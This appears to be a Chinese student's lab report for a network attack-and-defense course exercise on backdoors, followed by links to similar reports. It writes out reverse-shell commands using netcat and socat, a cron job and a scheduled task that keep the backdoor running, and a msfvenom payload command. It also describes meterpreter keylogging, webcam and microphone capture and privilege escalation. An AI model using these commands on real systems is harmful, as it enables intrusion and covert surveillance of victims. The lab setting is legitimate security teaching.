20155318 《网络攻防》Exp2 后门原理与实践
20155318 《网络攻防》Exp2 后门原理与实践
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 下载软件前要勾选一些用户协议,其中部分就存在后门进入系统的安全隐患。
- 例举你知道的后门如何启动起来(win及linux)的方式?
- 运行某些程序、或者打开一些文件时后门就会自启动。
- Meterpreter有哪些给你映像深刻的功能?
- 在对方植入后门的情况下控制他的电脑,启动摄像头。
- 如何发现自己有系统有没有被安装后门?
- 查看正在运行中的程序,被开放的端口是否有异常。
实验内容
使用netcat获取主机操作Shell,cron启动
Windows获得Linux Shell
- 查询window7的ip使用ncat.exe程序监听本机的5318端口
- 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5318端口
- Windows下成功获得了一个Kali的shell,运行结果如下:
Linux获得Windows Shell
- 过程与上类似,kali下使用nc指令监听5318端口,在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5318端口,运行结果如下:
使用nc传输数据
- Windows下监听5318端口:
- Kali下连接到Windows的5318端口:
- 建立连接之后,两台主机聊天
使用netcat获取主机操作Shell,cron启动
- 先在Windows系统下,监听5318端口:
- 用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
- 在最后一行添加xx * * * * /bin/netcat 192.168.88.129 5318 -e /bin/sh,意思是在每个小时的第xx分钟反向连接Windows主机的5318端口,我将时间设置在了一分钟以后:
使用socat获取主机操作Shell, 任务计划启动
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
- 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5318 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5318,同时把cmd.exe的stderr重定向到stdout上
- 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
- 在Kali环境下输入指令socat - tcp:192.168.88.129:5318,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5318端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 输入指令`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.135 LPORT=5318 -f exe > 5318_backdoor.exe
生成后门程序: - 通过nc指令将生成的后门程序传送到Windows主机上:
- 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口,用
show options
查看 - 进行监听,打开Windows上的后门程序,此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用record_mic指令可以截获一段音频:
- 使用webcam_snap指令可以使用摄像头进行拍照:(忽略画面)
- 使用screenshot指令可以进行截屏:
- 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功
实验总结与体会
这次试验让我有了一种假装自己是黑客的感觉,按照老师的要求完成实验内容,初步了解了后门的原理和实践情况。印象最深的是截屏和启动摄像头这两个功能。但是目前的实验还是在关闭防火墙,关闭杀毒软件的环境下完成的,更期待今后在不刻意关闭这些的情况下的实验项目~
20155318 《网络攻防》Exp2 后门原理与实践的更多相关文章
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践
2018-2019-2 20165312<网络攻防技术>Exp2 后门原理与实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证.隐通道 ...
- 20155308 《网络攻防》 Exp2 后门原理与实践
20155308 <网络攻防> Exp2 后门原理与实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpraeter的应用 :MSF POST 模块的应用 学 ...
- 20155321 《网络攻防》 Exp2 后门原理与实践
20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站 ...
- 20155336 虎光元《网络攻防》Exp2后门原理与实践
20155336 虎光元<网络攻防>Exp2后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shel ...
- 20155306 白皎 《网络攻防》 Exp2 后门原理与实践
20155306 白皎 <网络攻防> Exp2 后门原理与实践 一.实践基础 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作.后程序和电脑病毒最大的差别, ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒 ...
随机推荐
- 【python】python常用函数
urlencode与urldecode 当url中包含中文或者参数包含中文,需要对中文或者特殊字符(/.&)做编码转换. urlencode的本质:把字符串转为gbk编码,再把\x替换成%.如 ...
- Android应用耗电量统计,无需USB连接
Android应用耗电量统计一直是一个很头疼的问题,手工统计耗时太长,自动化统计又不是非常精准(执行自动化代码需要通过USB连接,而USB又会充电,这就造成统计数据不准).后来从前辈那里得知可以通过a ...
- jqgrid 使用altRows和altclass属性实现隔行换色
如果只是简单的区别奇偶行的话,设置两个属性,加一个样式 altRows:true, altclass:'someClass' .someClass { background-color: #DDDDD ...
- Mbps Mb M Kb如何换算
在传输单位的写法上,B 和 b 分别代表 Bytes 和 bits,两者的定义是不同的,具体换算公式如下:1 Byte = 8 bits 1 Kb = 1024 bits 1 KB = 1024 by ...
- 如何在 Azure 中均衡 Windows 虚拟机负载以创建具有高可用性的应用程序
负载均衡通过将传入请求分布到多个虚拟机来提供更高级别的可用性. 本教程介绍了 Azure 负载均衡器的不同组件,这些组件用于分发流量和提供高可用性. 你将学习如何执行以下操作: 创建 Azure 负载 ...
- Redis集群迁移
1:开发中断程序,登录各个主节点查看key信息 INFO # Keyspace db0:keys,expires,avg_ttl # Keyspace db0:keys,expires,avg_ttl ...
- cat > file << EOF 与 cat > file << -
当我们在使用kickstart 的时候,会遇到写网卡配置文件的情况,这时候我们使用cat > file << EOF 命令等,可以从标准输入中接受输入并保存到 file 文件中. c ...
- java实现安全证书相关操作
https://blog.csdn.net/zhushanzhi/article/details/77864516 版权声明:本文为博主原创文章,未经博主允许不得转载. package test; i ...
- DLL动态链接库导出函数方法 -- 动态导出(.def文件导出)
简介 动态链接库最大的优势在于可以提供给其他应用程序共享的资源,最小化应用程序代码的复杂度,其中一个十分重要的功能就是dll可以导出封装函数的功能.导出函数有两种主要方式,分别是静态导入和动态导入,本 ...
- 【2017下集美大学软工1412班_助教博客】团队作业4——Alpha冲刺日志公示
作业要求 团队作业4--第一次项目冲刺(Alpha版本) 团队评分结果和评分标准 检查项 总分 会议内容 代码签入 心得体会或其他记录 燃尽图 会议照片 评论区反馈 组别 分值 10 2 2 2 1 ...